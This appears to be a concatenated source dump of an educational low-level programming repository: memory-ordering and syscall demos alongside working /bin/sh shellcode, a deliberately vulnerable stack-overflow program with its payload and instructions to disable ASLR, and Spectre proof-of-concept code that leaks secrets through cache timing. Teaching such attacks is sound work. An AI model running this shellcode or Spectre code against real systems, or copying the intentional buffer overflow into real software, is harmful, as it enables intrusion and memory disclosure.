1321 | ERROR_PLATFORM_BUS_VALID Valid;
1322 | ERROR_STATUS ErrorStatus; // Bus Error Status
1323 | ULONGLONG RequestorId; // Bus Requester ID at the time of the event
1324 | ULONGLONG ResponderId; // Bus Responder ID at the time of the event
1325 | ULONGLONG TargetId; // Bus intended Target ID at the time of the event
1326 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1327 | UCHAR OemId[16]; // OEM specific data for bus identification
1328 | ERROR_OEM_DATA OemData; // OEM specific data
1329 | #if 0
1330 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1331 | #endif // 0
1332 | } ERROR_PLATFORM_BUS, *PERROR_PLATFORM_BUS;
1333 |
1334 | //
1335 | // IA64 ERRORS: Platform Host Controller error device definitions
1336 | //
1337 |
1338 | #define ERROR_PLATFORM_HOST_CONTROLLER_GUID \
1339 | { 0xe429faf8, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
1340 |
1341 |
1342 | typedef union _ERROR_PLATFORM_HOST_CONTROLLER_VALID {
1343 | ULONGLONG Valid;
1344 | struct { // Bits:
1345 | ULONGLONG ErrorStatus:1; // 0: Error Status valid bit
1346 | ULONGLONG RequestorId:1; // 1: Requester Identifier valid bit
1347 | ULONGLONG ResponderId:1; // 2: Responder Identifier valid bit
1348 | ULONGLONG TargetId:1; // 3: Target Identifier valid bit
1349 | ULONGLONG BusSpecificData:1; // 4: Bus Specific Data valid bit
1350 | ULONGLONG OemId:1; // 5: OEM Identification valid bit
1351 | ULONGLONG OemData:1; // 6: OEM Data valid bit
1352 | ULONGLONG OemDevicePath:1; // 7: OEM Device Path valid bit
1353 | ULONGLONG Reserved:56; // 63-8: Reserved
1354 | } DUMMYSTRUCTNAME;
1355 | } ERROR_PLATFORM_HOST_CONTROLLER_VALID, *PERROR_PLATFORM_HOST_CONTROLLER_VALID;
1356 |
1357 | typedef struct _ERROR_PLATFORM_HOST_CONTROLLER {
1358 | ERROR_SECTION_HEADER Header;
1359 | ERROR_PCI_COMPONENT_VALID Valid;
1360 | ERROR_STATUS ErrorStatus; // Host Controller Error Status
1361 | ULONGLONG RequestorId; // Host controller Requester ID at the time of the event
1362 | ULONGLONG ResponderId; // Host controller Responder ID at the time of the event
1363 | ULONGLONG TargetId; // Host controller intended Target ID at the time of the event
1364 | ERROR_BUS_SPECIFIC_DATA BusSpecificData; // OEM specific Bus dependent data
1365 | UCHAR OemId[16]; // OEM specific data for bus identification
1366 | ERROR_OEM_DATA OemData; // OEM specific data
1367 | #if 0
1368 | UCHAR OemDevicePath[/* 16 ? */]; // OEM specific vendor device path.
1369 | #endif // 0
1370 | } ERROR_PLATFORM_HOST_CONTROLLER, *PERROR_PLATFORM_HOST_CONTROLLER;
1371 |
1372 | //
1373 | // IA64 ERROR_LOGRECORDS definitions
1374 | //
1375 | // MCA_EXCEPTION,
1376 | // CMC_EXCEPTION,
1377 | // CPE_EXCEPTION.
1378 | //
1379 |
1380 | // For compatibility with previous versions of the definitions:
1381 | typedef ERROR_RECORD_HEADER ERROR_LOGRECORD, *PERROR_LOGRECORD;
1382 |
1383 | typedef ERROR_RECORD_HEADER MCA_EXCEPTION, *PMCA_EXCEPTION; // Machine Check Abort
1384 | typedef ERROR_RECORD_HEADER CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check
1385 | typedef ERROR_RECORD_HEADER CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error
1386 | #if (NTDDI_VERSION > NTDDI_WINXP)
1387 | typedef ERROR_RECORD_HEADER INIT_EXCEPTION, *PINIT_EXCEPTION; // Init Event
1388 | #endif
1389 |
1390 | #endif // _IA64_
1391 |
1392 | #elif defined(_ARM_) || defined(_ARM64_)
1393 |
1394 | // _ARM_WORKITEM_ MCE support
1395 |
1396 | typedef struct _MCA_EXCEPTION {
1397 |
1398 | ULONG Dummy;
1399 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
1400 |
1401 | #endif // defined(_X86_) || defined(_IA64_) || defined(_AMD64_)
1402 |
1403 | #if _MSC_VER >= 1200
1404 | #pragma warning(pop)
1405 | #endif
1406 |
1407 | #endif // _MCE_
1408 |
1409 |
1410 |
--------------------------------------------------------------------------------
/source/meltdown/winDriver/ntoskrnl.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/meltdown/winDriver/ntoskrnl.lib
--------------------------------------------------------------------------------
/source/mfence-win.cpp:
--------------------------------------------------------------------------------
1 | //Build with Visual Studio choose:X86
2 |
3 | #include
4 | #include
5 | #include
6 |
7 | int v1, v2, r1, r2;
8 | HANDLE start1, start2, complete;
9 |
10 | void thread1()
11 | {
12 | while (true)
13 | {
14 | WaitForSingleObject(start1, INFINITE); //wait for start
15 | v1 = 1;
16 |
17 | //__asm { mfence }
18 |
19 | r1 = v2;
20 | ReleaseSemaphore(complete, 1, NULL); //complete & trigger a signal
21 | }
22 | }
23 |
24 | void thread2()
25 | {
26 | while (true)
27 | {
28 | WaitForSingleObject(start2, INFINITE); //wait for start
29 | v2 = 1;
30 |
31 | //__asm { mfence }
32 |
33 | r2 = v1;
34 | ReleaseSemaphore(complete, 1, NULL); //complete & trigger a signal
35 | }
36 | }
37 |
38 | int main()
39 | {
40 | start1 = CreateSemaphore(NULL, 0, 1, NULL);
41 | start2 = CreateSemaphore(NULL, 0, 1, NULL);
42 | complete = CreateSemaphore(NULL, 0, 2, NULL);
43 |
44 | std::thread t1(thread1);
45 | std::thread t2(thread2);
46 |
47 | for (int i = 0; i < 300000; i++)
48 | {
49 | v1 = v2 = 0;
50 |
51 | ReleaseSemaphore(start1, 1, NULL); //start t1
52 | ReleaseSemaphore(start2, 1, NULL); //start t2
53 |
54 | //wait for t1&t2 completion
55 | WaitForSingleObject(complete, INFINITE);
56 | WaitForSingleObject(complete, INFINITE);
57 |
58 | if ((r1 == 0) && (r2 == 0))
59 | {
60 | printf("reorder detected @ %d\n", i);
61 | }
62 | }
63 |
64 | t1.detach();
65 | t2.detach();
66 | }
67 |
--------------------------------------------------------------------------------
/source/mfence.cpp:
--------------------------------------------------------------------------------
1 | //g++ mfence.cpp --std=c++20 -lpthread
2 | //g++ mfence.cpp --std=c++20 -lpthread -O3
3 | #include
4 | #include
5 | #include
6 |
7 | int v1, v2, r1, r2;
8 | sem_t start1, start2, complete;
9 |
10 | void thread1()
11 | {
12 | while(true)
13 | {
14 | sem_wait(&start1); //wait for start
15 | v1 = 1;
16 |
17 | //asm ("mfence" ::: "memory");
18 |
19 | r1 = v2;
20 | sem_post(&complete); //complete & trigger a signal
21 | }
22 | }
23 |
24 | void thread2()
25 | {
26 | while(true)
27 | {
28 | sem_wait(&start2); //wait for start
29 | v2 = 1;
30 |
31 | //asm ("mfence" ::: "memory");
32 |
33 | r2 = v1;
34 | sem_post(&complete); //complete & trigger a signal
35 | }
36 | }
37 |
38 | int main()
39 | {
40 | sem_init(&start1, 0, 0);
41 | sem_init(&start2, 0, 0);
42 | sem_init(&complete, 0, 0);
43 |
44 | std::thread t1(thread1);
45 | std::thread t2(thread2);
46 |
47 | for(int i = 0; i < 300000; i++)
48 | {
49 | v1 = v2 = 0;
50 |
51 | sem_post(&start1); //start t1
52 | sem_post(&start2); //start t2
53 |
54 | //wait for t1&t2 completion
55 | sem_wait(&complete);
56 | sem_wait(&complete);
57 |
58 | if((r1 == 0) && (r2 == 0))
59 | {
60 | printf("reorder detected @ %d\n", i);
61 | }
62 | }
63 |
64 | t1.detach();
65 | t2.detach();
66 | }
67 |
--------------------------------------------------------------------------------
/source/prediction.c:
--------------------------------------------------------------------------------
1 | //Build with Visual Studio command prompt: cl.exe prediction.c
2 | //Build with GCC: gcc prediction.c
3 |
4 | #ifdef _MSC_VER
5 | #include
6 | #else
7 | #include
8 | #endif
9 | #include
10 | #include
11 | #include
12 |
13 | #define PAGE_NUM 256
14 | #define CACHE_HIT_THRESHOLD 100
15 |
16 | int get_access_time(uint8_t* page)
17 | {
18 | unsigned long long tick1, tick2;
19 | unsigned int aux;
20 |
21 | tick1 = __rdtscp(&aux);
22 | uint8_t tmp = *page;
23 | tick2 = __rdtscp(&aux);
24 |
25 | return (tick2 - tick1);
26 | }
27 |
28 | static uint8_t mem_pages[PAGE_NUM][1024 * 4];
29 |
30 | int detect_cached_page()
31 | {
32 | //find the pages which in cache. Order is lightly mixed up to prevent stride prediction
33 | for (int i = 0; i < PAGE_NUM; i++)
34 | {
35 | uint8_t mix_i = ((i * 167) + 13) & 255;
36 | if (get_access_time(mem_pages[mix_i]) < CACHE_HIT_THRESHOLD)
37 | {
38 | return mix_i;
39 | }
40 | }
41 |
42 | return -1;
43 | }
44 |
45 | int data = 100;
46 |
47 | int main()
48 | {
49 | memset(mem_pages, 1, sizeof(mem_pages));
50 |
51 | for(int i = 0; i < 30; i++)
52 | {
53 | _mm_clflush(&data);
54 | for (int i = 0; i < PAGE_NUM; i++)
55 | {
56 | _mm_clflush(mem_pages[i]);
57 | }
58 |
59 | if(data == 0)
60 | {
61 | data = mem_pages[37][0];
62 | }
63 |
64 | int cached_page = detect_cached_page();
65 |
66 | printf("cached page:%d, data: %d\n", cached_page, data);
67 | }
68 | }
69 |
--------------------------------------------------------------------------------
/source/setjmp-longjmp.c:
--------------------------------------------------------------------------------
1 | //gcc setjmp-longjmp.c
2 |
3 | #include
4 |
5 | __attribute__((naked,returns_twice))
6 | int my_setjmp(void* context)
7 | {
8 | asm("mov %%rbp, (%%rdi);"
9 | "mov %%rsp, 8(%%rdi);"
10 | "mov (%%rsp), %%rax;"
11 | "mov %%rax, 16(%%rdi);"
12 | "mov $0, %%rax;"
13 | "ret;"
14 | :::);
15 | }
16 |
17 | __attribute__((naked,noreturn))
18 | void my_longjmp(void* context, int value)
19 | {
20 | asm("mov (%%rdi), %%rbp;"
21 | "mov 8(%%rdi), %%rsp;"
22 | "mov %%rsi, %%rax;"
23 | "jmp 16(%%rdi);"
24 | :::);
25 | }
26 |
27 | long context[3];
28 |
29 | void func2()
30 | {
31 | printf("func2 start\n");
32 | my_longjmp(context, 100);
33 | printf("func2 return\n");
34 | }
35 |
36 | void func1()
37 | {
38 | printf("func1 start\n");
39 | func2();
40 | printf("func1 return\n");
41 | }
42 |
43 | int main()
44 | {
45 | printf("main start\n");
46 | int value = my_setjmp(context);
47 | if(value == 0 )
48 | {
49 | func1();
50 | }
51 | printf("main return\n");
52 | return value;
53 | }
54 |
--------------------------------------------------------------------------------
/source/shellcode/injectShellcode.c:
--------------------------------------------------------------------------------
1 | //echo 0 > /proc/sys/kernel/randomize_va_space
2 | //gcc -fno-stack-protector -z execstack injectShellcode.c
3 | //./a.out and input: shellcode.bin
4 | //./a.out and input: shellcodeSled.bin
5 |
6 | //Make sure the content of shellcode.bin is like this:
7 | char shellcode[] = "\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05\x00"//Shellcode here; add 0x00 for 64-bit (8-byte) alignment.
8 | "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" // RBP is here; no impact on shellcode.
9 | "\xd0\xe2\xff\xff\xff\x7f\x00\x00";// The return address is here and should be changed to the address of the shellcode (i.e., the address of the vulnerableBuffer array). Please update the value if the address on your machine is different.
10 |
11 | //Input shellcode via the keyboard and update the address of the shellcode if necessary.
12 | //echo -ne '\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05\x00\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xd0\xe2\xff\xff\xff\x7f\x00\x00' | ./a.out
13 |
14 | #include
15 |
16 | int readFile(const char* path, unsigned char* vulnerableBuffer)
17 | {
18 | FILE* file = fopen(path, "rb");
19 | if (file == NULL) {
20 | perror("Error opening file");
21 | return 1;
22 | }
23 |
24 | // Move to the end to get file size
25 | fseek(file, 0, SEEK_END);
26 | long fileSize = ftell(file);// fileSize = 48, the vulnerableBuffer will overflow.
27 | rewind(file); // Reset file pointer to beginning
28 |
29 | // The vulnerableBuffer overflows here
30 | if(fileSize != fread(vulnerableBuffer, 1, fileSize, file))
31 | {
32 | perror("Error fread");
33 | }
34 | }
35 |
36 | char fileName[32];
37 | void vulnerableFunction()
38 | {
39 | unsigned char vulnerableBuffer[32];
40 | printf("Load the file at: %p\nPlease enter the file name:", vulnerableBuffer);
41 | gets(fileName);
42 | readFile(fileName, vulnerableBuffer);
43 | }// will run shellcode.bin here.
44 |
45 | int main()
46 | {
47 | vulnerableFunction();
48 | printf("Bye👋\n");
49 | }
50 |
--------------------------------------------------------------------------------
/source/shellcode/shellcode-non-zero.s:
--------------------------------------------------------------------------------
1 | # 1) apt install nasm
2 | # 2) nasm -f elf64 shellcode-non-zero.s && ld shellcode-non-zero.o
3 | # 3) ./a.out
4 | # 4) objdump -d shellcode-non-zero.o
5 |
6 | section .text
7 | global _start
8 | _start:
9 | xor rsi, rsi ;arg1
10 | xor rdx, rdx ;arg2
11 |
12 | mov rbx, 0x7768732f6e69622f ;rbx = "/bin/shw"
13 | sal rbx, 8
14 | shr rbx, 8 ;rbx = "/bin/sh"
15 |
16 | push rbx
17 | mov rdi, rsp ;arg0 = address of "/bin/sh"
18 |
19 | mov al, 0x3b
20 | syscall
21 |
--------------------------------------------------------------------------------
/source/shellcode/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/shellcode/shellcode.bin
--------------------------------------------------------------------------------
/source/shellcode/shellcode.c:
--------------------------------------------------------------------------------
1 | //gcc -z execstack shellcode.c
2 | //a.out
3 |
4 | int main()
5 | {
6 | unsigned char shellcode[] = "\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\xb8\x3b\x00\x00\x00\x0f\x05";
7 |
8 | //unsigned char shellcodeNonZero[] = "\x48\x31\xf6\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x77\x48\xc1\xe3\x08\x48\xc1\xeb\x08\x53\x48\x89\xe7\xb0\x3b\x0f\x05";
9 |
10 | void (*exec)() = (void(*)())shellcode;
11 | exec();
12 | }
13 |
--------------------------------------------------------------------------------
/source/shellcode/shellcode.s:
--------------------------------------------------------------------------------
1 | # 1) apt install nasm
2 | # 2) nasm -f elf64 shellcode.s && ld shellcode.o
3 | # 3) ./a.out
4 | # 4) objdump -d shellcode.o
5 |
6 | section .text
7 | global _start
8 | _start:
9 | mov rsi, 0 ;arg1
10 | mov rdx, 0 ;arg2
11 |
12 | mov rbx, 0x68732f6e69622f ;"/bin/sh"
13 | push rbx
14 | mov rdi, rsp ;arg0 = "/bin/sh"
15 |
16 | mov rax, 0x3b
17 | syscall
18 |
--------------------------------------------------------------------------------
/source/shellcode/shellcodeSled.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/shellcode/shellcodeSled.bin
--------------------------------------------------------------------------------
/source/spectre/spectre-ii.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #ifdef _MSC_VER
5 | #include /* for rdtscp and clflush */
6 | #pragma optimize("gt",on)
7 | #else
8 | #include /* for rdtscp and clflush */
9 | #endif
10 |
11 | #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
12 |
13 | uint8_t array[16] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
14 | uint8_t mem_pages[256][4096];
15 |
16 | void victim_function(size_t index)
17 | {
18 | _mm_clflush(array);
19 | for (volatile int z = 0; z < 100; z++);
20 |
21 | uint8_t temp = 0;
22 | if (index < sizeof(array))
23 | {
24 | temp = mem_pages[array[index]][0];
25 | }
26 | }
27 |
28 | void speculative_execution(uint8_t* target, int tries)
29 | {
30 | register int offset_to_array = (target - array);
31 | register size_t training_x, index;
32 | training_x = tries % sizeof(array);
33 | for (int i = 0; i < 30; i++)
34 | {
35 | index = ((i % (sizeof(array)/2)) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
36 | index = (index | (index >> sizeof(array))); /* Set x=-1 if j&6=0, else x=0 */
37 | index = training_x ^ (index & (offset_to_array ^ training_x));
38 | victim_function(index);
39 | }
40 | }
41 |
42 | uint8_t get_best_result(int results[256])
43 | {
44 | uint8_t ret = '?';
45 | int max = 0;
46 | for (int i = 0; i < 256; i++)
47 | {
48 | if (results[i] > max)
49 | {
50 | max = results[i];
51 | ret = i;
52 | }
53 | }
54 |
55 | return ret;
56 | }
57 |
58 | void detect_cached_page(int results[256])
59 | {
60 | /* Time reads. Order is lightly mixed up to prevent stride prediction */
61 | int junk;
62 | for (int i = 0; i < 256; i++) {
63 | int mix_i = ((i * 167) + 13) & 255;
64 | volatile uint8_t* addr = mem_pages[mix_i];
65 | register uint64_t time1 = __rdtscp(&junk); /* READ TIMER */
66 | junk = *addr; /* MEMORY ACCESS TO TIME */
67 | register uint64_t time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
68 | if (time2 <= CACHE_HIT_THRESHOLD)
69 | results[mix_i]++; /* cache hit - add +1 to score for this value */
70 | }
71 | }
72 |
73 | uint8_t probe(char* target)
74 | {
75 | static int results[256];
76 | int tries, i, j, k, mix_i, junk = 0;
77 |
78 | for (i = 0; i < 256; i++)
79 | results[i] = 0;
80 | for (tries = 0; tries < 999; tries++)
81 | {
82 | for (i = 0; i < 256; i++)
83 | {
84 | _mm_clflush(mem_pages[i]);
85 | }
86 |
87 | speculative_execution(target, tries);
88 |
89 | detect_cached_page(results);
90 | }
91 |
92 | return get_best_result(results);
93 | }
94 |
95 | char *secret = "Hello, Abu coding!";
96 |
97 | int main()
98 | {
99 | int i, score[2], len=18;
100 | uint8_t value[2];
101 |
102 | for (i = 0; i < sizeof(mem_pages); i++)
103 | mem_pages[0][i] = 1; /* write to mem_pages so in RAM not copy-on-write zero pages */
104 |
105 | while (--len >= 0)
106 | {
107 | uint8_t ret = probe(secret++);
108 | printf("%c ", ret);
109 | }
110 | printf("\n");
111 | }
--------------------------------------------------------------------------------
/source/spectre/spectre-iii.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #ifdef _MSC_VER
5 | #include /* for rdtscp and clflush */
6 | #pragma optimize("gt",on)
7 | #else
8 | #include /* for rdtscp and clflush */
9 | #endif
10 |
11 | /********************************************************************
12 | Victim code.
13 | ********************************************************************/
14 | unsigned int array1_size = 16;
15 | uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
16 | uint8_t mem_pages[256 * 512];
17 |
18 | char *secret = "The Magic Words are Squeamish Ossifrage.";
19 |
20 | uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
21 |
22 | void victim_function(size_t x) {
23 | if (x < array1_size) {
24 | temp = mem_pages[array1[x] * 512];
25 | }
26 | }
27 |
28 | #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
29 |
30 | /* Report best guess in value[0] and runner-up in value[1] */
31 | void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
32 | static int results[256];
33 | int tries, i, j, k, mix_i, junk = 0;
34 | size_t training_x, x;
35 | register uint64_t time1, time2;
36 | volatile uint8_t *addr;
37 |
38 | for (i = 0; i < 256; i++)
39 | results[i] = 0;
40 | for (tries = 999; tries > 0; tries--) {
41 |
42 | /* Flush mem_pages[256*(0..255)] from cache */
43 | for (i = 0; i < 256; i++)
44 | _mm_clflush(&mem_pages[i * 512]); /* intrinsic for clflush instruction */
45 |
46 | /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
47 | training_x = tries % array1_size;
48 | for (j = 29; j >= 0; j--) {
49 | _mm_clflush(&array1_size);
50 | for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
51 |
52 | /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
53 | /* Avoid jumps in case those tip off the branch predictor */
54 | x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
55 | x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
56 | x = training_x ^ (x & (malicious_x ^ training_x));
57 |
58 | /* Call the victim! */
59 | victim_function(x);
60 | }
61 |
62 | /* Time reads. Order is lightly mixed up to prevent stride prediction */
63 | for (i = 0; i < 256; i++) {
64 | mix_i = ((i * 167) + 13) & 255;
65 | addr = &mem_pages[mix_i * 512];
66 | time1 = __rdtscp(&junk); /* READ TIMER */
67 | junk = *addr; /* MEMORY ACCESS TO TIME */
68 | time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
69 | if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
70 | results[mix_i]++; /* cache hit - add +1 to score for this value */
71 | }
72 |
73 | /* Locate highest & second-highest results results tallies in j/k */
74 | j = k = -1;
75 | for (i = 0; i < 256; i++) {
76 | if (j < 0 || results[i] >= results[j]) {
77 | k = j;
78 | j = i;
79 | } else if (k < 0 || results[i] >= results[k]) {
80 | k = i;
81 | }
82 | }
83 | if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
84 | break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
85 | }
86 | results[0] ^= junk; /* use junk so code above won’t get optimized out*/
87 | value[0] = (uint8_t)j;
88 | score[0] = results[j];
89 | value[1] = (uint8_t)k;
90 | score[1] = results[k];
91 | }
92 |
93 | int main(int argc, const char **argv) {
94 | size_t malicious_x=(size_t)(secret-(char*)array1); /* default for malicious_x */
95 | int i, score[2], len=40;
96 | uint8_t value[2];
97 |
98 | for (i = 0; i < sizeof(mem_pages); i++)
99 | mem_pages[i] = 1; /* write to mem_pages so in RAM not copy-on-write zero pages */
100 |
101 | while (--len >= 0) {
102 | printf("Reading at malicious_x = %p... ", (void*)malicious_x);
103 | readMemoryByte(malicious_x++, value, score);
104 | printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
105 | printf("0x%02X=’%c’ score=%d ", value[0],
106 | (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
107 | if (score[1] > 0)
108 | printf("(second best: 0x%02X score=%d)", value[1], score[1]);
109 | printf("\n");
110 | }
111 | return (0);
112 | }
--------------------------------------------------------------------------------
/source/spectre/spectre.c:
--------------------------------------------------------------------------------
1 | //Build with Visual Studio command prompt: cl.exe spectre.c
2 | //Build with GCC: gcc spectre.c
3 |
4 | #ifdef _MSC_VER
5 | #include
6 | #pragma optimize("gt",on)
7 | #else
8 | #include
9 | #endif
10 | #include
11 | #include
12 | #include
13 |
14 | #define PAGE_NUM 256
15 | #define CACHE_HIT_THRESHOLD 100
16 |
17 | uint8_t array[16] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
18 | uint8_t mem_pages[PAGE_NUM][4096];
19 |
20 | void do_speculative_execution(size_t index)
21 | {
22 | _mm_clflush(array);
23 | for (volatile int z = 0; z < 100; z++);
24 |
25 | if (index < sizeof(array))
26 | {
27 | mem_pages[array[index]][0] = 0;
28 | }
29 | }
30 |
31 | void speculative_execution(uint8_t* target, int tries)
32 | {
33 | register int offset_to_array = (target - array);
34 | register size_t training_x, index;
35 | training_x = tries % sizeof(array);
36 | for (int i = 0; i < 60; i++)
37 | {
38 | index = ((i % (sizeof(array)/2)) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
39 | index = (index | (index >> sizeof(array))); /* Set x=-1 if j&6=0, else x=0 */
40 | index = training_x ^ (index & (offset_to_array ^ training_x));
41 | do_speculative_execution(index);
42 | }
43 | }
44 |
45 | int get_access_time(uint8_t* page)
46 | {
47 | unsigned long long tick1, tick2;
48 | unsigned int aux;
49 |
50 | tick1 = __rdtscp(&aux);
51 | uint8_t tmp = *page;
52 | tick2 = __rdtscp(&aux);
53 |
54 | return (tick2 - tick1);
55 | }
56 |
57 | void detect_cached_page(int results[PAGE_NUM])
58 | {
59 | int min_time = 10000000;
60 | int cached_page_index = -1;
61 | for (int i = 0; i < PAGE_NUM; i++)
62 | {
63 | //Order is lightly mixed up to prevent stride prediction
64 | int mixed_i = ((i * 167) + 13) & 255;
65 | int access_time = get_access_time(mem_pages[mixed_i]);
66 | if (min_time > access_time)
67 | {
68 | min_time = access_time;
69 | cached_page_index = mixed_i;
70 | }
71 | }
72 |
73 | if(-1 != cached_page_index)
74 | {
75 | results[cached_page_index]++;
76 | }
77 | }
78 |
79 | uint8_t get_best_result(int results[PAGE_NUM])
80 | {
81 | uint8_t ret = '?';
82 | int max = 0;
83 | for (int i = 0; i < PAGE_NUM; i++)
84 | {
85 | if (results[i] > max)
86 | {
87 | max = results[i];
88 | ret = i;
89 | }
90 | }
91 |
92 | if(ret < 32 || ret > 126) ret = 'x';
93 | //printf("%c, score: %d\n", ret, results[ret]);
94 | return ret;
95 | }
96 |
97 | uint8_t probe(uint8_t* target)
98 | {
99 | int results[PAGE_NUM];
100 | memset(results, 0, sizeof(results));
101 |
102 | for (int tries = 0; tries < 300; tries++)
103 | {
104 | for (int i = 0; i < PAGE_NUM; i++)
105 | {
106 | _mm_clflush(mem_pages[i]);
107 | }
108 |
109 | speculative_execution(target, tries);
110 |
111 | detect_cached_page(results);
112 | }
113 |
114 | return get_best_result(results);
115 | }
116 |
117 | char *secret = "Hello";
118 |
119 | int main()
120 | {
121 | memset(mem_pages, 1, sizeof(mem_pages));
122 |
123 | int len = strlen(secret);
124 |
125 | printf("secret = ");//sleep(1);
126 |
127 | for(int i = 0; i < len; i++)
128 | {
129 | printf("%c", probe(&secret[i]));
130 | }
131 | printf("\n");
132 | }
133 |
--------------------------------------------------------------------------------
/source/syscall.s:
--------------------------------------------------------------------------------
1 | # 1) apt install nasm
2 | # 2) nasm -f elf64 syscall.s && ld syscall.o
3 | # 3) ./a.out
4 |
5 | section .text
6 | global _start
7 | _start:
8 | mov rdi, 1 ;arg0
9 | mov rdx, 8 ;arg2
10 | mov rbx, 0x0a646c726f576948 ;arg1 = HiWorld\n
11 | ;mov rbx, 0x0a83989ff03a6948 ;arg1 = Hi:😃\n
12 | push rbx
13 | mov rsi, rsp
14 | mov rax, 1
15 | syscall
16 |
17 | mov rax, 60 ;exit
18 | syscall
19 |
20 |
--------------------------------------------------------------------------------
/source/virtualMemory.c:
--------------------------------------------------------------------------------
1 | //step 1: echo 0 > /proc/sys/kernel/randomize_va_space
2 | //step 2: gcc virtualMemory.c -o p1 && ./p1
3 | //step 3: int a = 2;
4 | //step 4: gcc virtualMemory.c -o p2 && ./p2
5 | //we will see the same address, but the value is different.
6 |
7 | #include
8 |
9 | int a = 1;//or 2
10 | int main()
11 | {
12 | printf("address: %p, value: %d\n", &a, a);
13 | }
14 |
--------------------------------------------------------------------------------